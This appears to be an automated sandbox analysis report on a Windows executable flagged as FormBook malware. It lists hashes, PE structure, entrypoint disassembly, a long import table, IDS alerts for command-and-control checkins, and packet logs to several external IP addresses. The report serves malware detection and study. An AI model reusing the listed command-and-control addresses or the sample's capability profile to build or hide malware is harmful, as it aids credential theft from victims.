                                                  SHA512:f1aa198ecfa67b35380867c4552a5e5eedfb3a67e49ef121c2de9a10bd8b00002ca15c66d90b89f20746ff8755cd2444b46cc5ade521d15020b21e8d686e5803
                                                  SSDEEP:24576:Mtb20pkaCqT5TBWgNQ7au7/cTDUaoFGXMt4V0WB6A:1Vg5tQ7au7UTnMs5
                                                  TLSH:9045CF2363DE8365C3B25273BA257701AEBB7C2506B1F86B2FD4293DE930161521E673
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                  File Icon

                                                  Icon Hash:d38d8c83818d898d

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x425f74
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x67353335 [Wed Nov 13 23:16:05 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                  Entrypoint Preview

                                                  Instruction
                                                  call 00007F47053929DFh
                                                  jmp 00007F47053859F4h
                                                  int3
                                                  int3
                                                  push edi
                                                  push esi
                                                  mov esi, dword ptr [esp+10h]
                                                  mov ecx, dword ptr [esp+14h]
                                                  mov edi, dword ptr [esp+0Ch]
                                                  mov eax, ecx
                                                  mov edx, ecx
                                                  add eax, esi
                                                  cmp edi, esi
                                                  jbe 00007F4705385B7Ah
                                                  cmp edi, eax
                                                  jc 00007F4705385EDEh
                                                  bt dword ptr [004C0158h], 01h
                                                  jnc 00007F4705385B79h
                                                  rep movsb
                                                  jmp 00007F4705385E8Ch
                                                  cmp ecx, 00000080h
                                                  jc 00007F4705385D44h
                                                  mov eax, edi
                                                  xor eax, esi
                                                  test eax, 0000000Fh
                                                  jne 00007F4705385B80h
                                                  bt dword ptr [004BA370h], 01h
                                                  jc 00007F4705386050h
                                                  bt dword ptr [004C0158h], 00000000h
                                                  jnc 00007F4705385D1Dh
                                                  test edi, 00000003h
                                                  jne 00007F4705385D2Eh
                                                  test esi, 00000003h
                                                  jne 00007F4705385D0Dh
                                                  bt edi, 02h
                                                  jnc 00007F4705385B7Fh
                                                  mov eax, dword ptr [esi]
                                                  sub ecx, 04h
                                                  lea esi, dword ptr [esi+04h]
                                                  mov dword ptr [edi], eax
                                                  lea edi, dword ptr [edi+04h]
                                                  bt edi, 03h
                                                  jnc 00007F4705385B83h
                                                  movq xmm1, qword ptr [esi]
                                                  sub ecx, 08h
                                                  lea esi, dword ptr [esi+08h]
                                                  movq qword ptr [edi], xmm1
                                                  lea edi, dword ptr [edi+08h]
                                                  test esi, 00000007h
                                                  je 00007F4705385BD5h
                                                  bt esi, 03h
                                                  jnc 00007F4705385C28h
                                                  movdqa xmm1, dqword ptr [esi+00h]

                                                  Rich Headers

                                                  Programming Language:
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [ASM] VS2012 UPD4 build 61030
                                                  • [RES] VS2012 UPD4 build 61030
                                                  • [LNK] VS2012 UPD4 build 61030

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x59684.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x11e0000x6c4c.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0xc40000x596840x598009a7c4d92b0b81fc9167f097398c558aeFalse0.9711614001396648data7.969652730856171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x11e0000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0xc43500x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                  RT_ICON0xc44780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 4724 x 4724 px/mEnglishGreat Britain0.2849437148217636
                                                  RT_STRING0xc55200x594dataEnglishGreat Britain0.3333333333333333
                                                  RT_STRING0xc5ab40x68adataEnglishGreat Britain0.2747909199522103
                                                  RT_STRING0xc61400x490dataEnglishGreat Britain0.3715753424657534
                                                  RT_STRING0xc65d00x5fcdataEnglishGreat Britain0.3087467362924282
                                                  RT_STRING0xc6bcc0x65cdataEnglishGreat Britain0.34336609336609336
                                                  RT_STRING0xc72280x466dataEnglishGreat Britain0.3605683836589698
                                                  RT_STRING0xc76900x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                  RT_RCDATA0xc77e80x559e5data1.000330773639622
                                                  RT_GROUP_ICON0x11d1d00x14dataEnglishGreat Britain1.2
                                                  RT_GROUP_ICON0x11d1e40x14dataEnglishGreat Britain1.15
                                                  RT_VERSION0x11d1f80xdcdataEnglishGreat Britain0.6181818181818182
                                                  RT_MANIFEST0x11d2d40x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                  Imports

                                                  DLLImport
                                                  WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                  COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                  PSAPI.DLLGetProcessMemoryInfo
                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                  USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                  UxTheme.dllIsThemeActive
                                                  KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                  USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                  GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                  ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                  OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                  Possible Origin

                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishGreat Britain

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-11-19T03:56:33.741883+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449890217.160.0.20080TCP
                                                  2024-11-19T03:56:36.651652+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449903217.160.0.20080TCP
                                                  2024-11-19T03:56:39.430836+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449914217.160.0.20080TCP
                                                  2024-11-19T03:56:48.389553+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449961203.161.46.20580TCP
                                                  2024-11-19T03:56:50.917047+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449973203.161.46.20580TCP
                                                  2024-11-19T03:56:53.471522+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449985203.161.46.20580TCP
                                                  2024-11-19T03:57:02.790158+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45001691.226.30.380TCP
                                                  2024-11-19T03:57:04.996899+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45001791.226.30.380TCP
                                                  2024-11-19T03:57:07.534889+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45001891.226.30.380TCP
                                                  2024-11-19T03:57:16.067744+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450020104.21.15.10080TCP
                                                  2024-11-19T03:57:18.626444+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450021104.21.15.10080TCP
                                                  2024-11-19T03:57:21.584196+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450022104.21.15.10080TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 19, 2024 03:56:16.280985117 CET4981580192.168.2.4103.21.221.4
                                                  Nov 19, 2024 03:56:16.286072969 CET8049815103.21.221.4192.168.2.4
                                                  Nov 19, 2024 03:56:16.286181927 CET4981580192.168.2.4103.21.221.4
                                                  Nov 19, 2024 03:56:16.294245005 CET4981580192.168.2.4103.21.221.4
                                                  Nov 19, 2024 03:56:16.299093962 CET8049815103.21.221.4192.168.2.4
                                                  Nov 19, 2024 03:56:17.406595945 CET8049815103.21.221.4192.168.2.4
                                                  Nov 19, 2024 03:56:17.461932898 CET4981580192.168.2.4103.21.221.4
                                                  Nov 19, 2024 03:56:17.598501921 CET8049815103.21.221.4192.168.2.4
                                                  Nov 19, 2024 03:56:17.598675013 CET4981580192.168.2.4103.21.221.4
                                                  Nov 19, 2024 03:56:17.600122929 CET4981580192.168.2.4103.21.221.4
                                                  Nov 19, 2024 03:56:17.605210066 CET8049815103.21.221.4192.168.2.4
                                                  Nov 19, 2024 03:56:32.671866894 CET4989080192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:32.676954031 CET8049890217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:32.677053928 CET4989080192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:32.816982985 CET4989080192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:32.822019100 CET8049890217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:33.741810083 CET8049890217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:33.741883039 CET4989080192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:34.337110043 CET4989080192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:34.342119932 CET8049890217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:35.355415106 CET4990380192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:35.360435963 CET8049903217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:35.360635996 CET4990380192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:35.374742031 CET4990380192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:35.379793882 CET8049903217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:36.647717953 CET8049903217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:36.651652098 CET4990380192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:36.883837938 CET4990380192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:36.890270948 CET8049903217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:37.902462959 CET4991480192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:37.907344103 CET8049914217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:37.907418013 CET4991480192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:37.921024084 CET4991480192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:37.926291943 CET8049914217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:37.926302910 CET8049914217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:37.926311016 CET8049914217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:37.926321983 CET8049914217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:37.926341057 CET8049914217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:37.926350117 CET8049914217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:37.926357985 CET8049914217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:37.926479101 CET8049914217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:37.926487923 CET8049914217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:39.430835962 CET4991480192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:39.458240032 CET8049914217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:39.458328009 CET4991480192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:40.449944973 CET4992780192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:40.456293106 CET8049927217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:40.457739115 CET4992780192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:40.467340946 CET4992780192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:40.473839045 CET8049927217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:41.740046024 CET8049927217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:41.740094900 CET8049927217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:41.740112066 CET8049927217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:41.740128040 CET8049927217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:41.740247965 CET4992780192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:41.740284920 CET4992780192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:42.013441086 CET8049927217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:42.013569117 CET4992780192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:42.017210007 CET4992780192.168.2.4217.160.0.200
                                                  Nov 19, 2024 03:56:42.023551941 CET8049927217.160.0.200192.168.2.4
                                                  Nov 19, 2024 03:56:47.591120005 CET4996180192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:47.596069098 CET8049961203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:47.596173048 CET4996180192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:47.609901905 CET4996180192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:47.614811897 CET8049961203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:48.389317989 CET8049961203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:48.389386892 CET8049961203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:48.389441967 CET8049961203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:48.389549971 CET8049961203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:48.389553070 CET4996180192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:48.389585972 CET8049961203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:48.389610052 CET4996180192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:48.389626980 CET8049961203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:48.389659882 CET8049961203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:48.389683008 CET4996180192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:48.389695883 CET8049961203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:48.389729977 CET8049961203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:48.389756918 CET4996180192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:48.389765024 CET8049961203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:48.389822006 CET4996180192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:48.394925117 CET8049961203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:48.394962072 CET8049961203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:48.394994974 CET8049961203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:48.395034075 CET4996180192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:48.402194023 CET8049961203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:48.402261972 CET4996180192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:49.118383884 CET4996180192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:50.136687040 CET4997380192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:50.141762972 CET8049973203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:50.141896009 CET4997380192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:50.155286074 CET4997380192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:50.160209894 CET8049973203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:50.916845083 CET8049973203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:50.916955948 CET8049973203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:50.916990042 CET8049973203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:50.917026043 CET8049973203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:50.917047024 CET4997380192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:50.917067051 CET8049973203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:50.917117119 CET4997380192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:50.917125940 CET8049973203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:50.917161942 CET8049973203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:50.917177916 CET4997380192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:50.917201996 CET8049973203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:50.917236090 CET8049973203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:50.917262077 CET4997380192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:50.917272091 CET8049973203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:50.917329073 CET4997380192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:50.922667980 CET8049973203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:50.922703981 CET8049973203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:50.922739029 CET8049973203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:50.922765017 CET4997380192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:50.922775984 CET8049973203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:50.922838926 CET4997380192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:50.930291891 CET8049973203.161.46.205192.168.2.4
                                                  Nov 19, 2024 03:56:50.930366993 CET4997380192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:51.665144920 CET4997380192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:52.683342934 CET4998580192.168.2.4203.161.46.205
                                                  Nov 19, 2024 03:56:52.688389063 CET8049985203.161.46.205192.168.2.4
